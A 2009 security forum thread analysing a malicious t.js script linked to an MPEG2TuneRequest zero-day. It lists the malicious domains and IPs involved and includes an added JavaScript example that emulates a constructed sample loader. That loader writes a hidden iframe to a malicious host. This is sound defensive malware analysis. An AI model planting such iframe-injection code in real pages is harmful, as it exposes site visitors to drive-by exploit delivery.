Author Topic: Zero-day MPEG2TuneRequest Exploit Leads to KILLAV  (Read 2941 times)


July 07, 2009, 07:20:29 am

SysAdMini

  • Administrator
  • Hero Member

Ruining the bad guy's day

July 09, 2009, 08:29:33 pm
Reply #1

MysteryFCM

  • Administrator
  • Hero Member

I thought I'd give you guys a quick analysis of what myb88.com/t.js (IP: 203.158.16.18), as mentioned by DNS-BH, actually does. The first thing we need to look at is the contents of t.js:

From here, we can see that it is loading an iframe to bybyybyb.com (59.34.197.154 - AS4134), based on whether tmpdomain is equal to zero (which is based on whether or not the URL matches any of the items in the arydomain array). This iframe then loads another iframe to index.htm, which contains:

http://hphosts.blogspot.com/2009/07/myb88comtjs-quick-analysis.html
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net
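The gating logic described in the reply above (an arydomain exclusion list, a tmpdomain flag, and a hidden iframe written only when the current URL is not on the list) is a common loader pattern, and the quickest way to see what such a script would inject is to run it against a stub document that records document.write() calls instead of rendering them. The following is an added example, not code from the post, from hpHosts or from the real t.js (whose contents are not reproduced on this page). SAMPLE_LOADER is a constructed script modelled on the description; emulateLoader, extractIframeSources and injectedIframesFor are names chosen here.

```javascript
// Added example: enumerating the iframes a gated loader would inject,
// using a stub document rather than a browser. Nothing is fetched.

// CONSTRUCTED sample modelled on the post's description of t.js: the
// iframe is only written when the page URL matches none of arydomain.
// This is not the real t.js.
const SAMPLE_LOADER = `
var arydomain = new Array("myb88.com", "localhost");
var tmpdomain = 0;
for (var i = 0; i < arydomain.length; i++) {
  if (document.URL.indexOf(arydomain[i]) != -1) { tmpdomain = 1; }
}
if (tmpdomain == 0) {
  document.write('<iframe src="http://bybyybyb.com/" width="0" height="0" frameborder="0"></iframe>');
}
`;

// Run loader source against a stub document that only records what
// would have been written. `window`, `document` and `location` are passed
// as parameters so the sample resolves those names to the stubs rather
// than to the host's globals.
function emulateLoader(source, pageUrl) {
  const writes = [];
  const stubLocation = { href: pageUrl, toString: () => pageUrl };
  const stubDocument = {
    URL: pageUrl,
    location: stubLocation,
    write: (html) => { writes.push(String(html)); },
    writeln: (html) => { writes.push(String(html) + "\n"); },
  };
  const stubWindow = { document: stubDocument, location: stubLocation };
  const run = new Function("window", "document", "location", source);
  run(stubWindow, stubDocument, stubLocation);
  return writes;
}

// Pull every iframe src out of the captured document.write() payloads.
function extractIframeSources(writes) {
  const re = /<iframe\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
  const found = [];
  for (const html of writes) {
    let m;
    while ((m = re.exec(html)) !== null) found.push(m[1]);
  }
  return found;
}

// Which iframe URLs would a visitor at pageUrl receive from this loader?
function injectedIframesFor(source, pageUrl) {
  return extractIframeSources(emulateLoader(source, pageUrl));
}

// Stand-alone run: one URL the loader exempts, one it attacks.
if (typeof require !== "undefined" && require.main === module) {
  for (const url of ["http://myb88.com/index.html", "http://victim.example/page.html"]) {
    console.log(url, "->", JSON.stringify(injectedIframesFor(SAMPLE_LOADER, url)));
  }
}
```

The exclusion list is why a quick check from the attacker's own domain (or from localhost) shows nothing: run the emulation with a few realistic third-party URLs, not just the one the script is hosted on. Note that new Function is not a sandbox; it still sees the host's globalThis, so a real sample should be run this way only inside a throwaway VM or a proper isolate, and only after the usual de-obfuscation.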

July 10, 2009, 05:28:52 am
Reply #2

RS-232

  • Special Access
  • Sr. Member

Only for the "fun" of it...rs-232 aka sowhat-x aka younameit ;-)
http://www.youtube.com/watch?v=fADjY97_KTw

July 10, 2009, 06:04:29 am
Reply #3

MysteryFCM

  • Administrator
  • Hero Member

NOD flagged it (the rar, as it was downloading) as the Statik trojan
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

July 10, 2009, 04:14:48 pm
Reply #4

RS-232

  • Special Access
  • Sr. Member

The executable there appears to be multi-packed, at least from a very quick first look...
probably also the reason that some AVs reported "unknown packer" etc.

...Here's another interesting thread that I stumbled upon:
http://bbs.pediy.com/showthread.php?t=92912
Related to the domains mentioned in pediy's thread above:
http://blog.scansafe.com/journal/2009/7/7/china-attacks-worsen.html
Only for the "fun" of it...rs-232 aka sowhat-x aka younameit ;-)
http://www.youtube.com/watch?v=fADjY97_KTw

July 11, 2009, 12:30:00 pm
Reply #5

RS-232

  • Special Access
  • Sr. Member

Only for the "fun" of it...rs-232 aka sowhat-x aka younameit ;-)
http://www.youtube.com/watch?v=fADjY97_KTw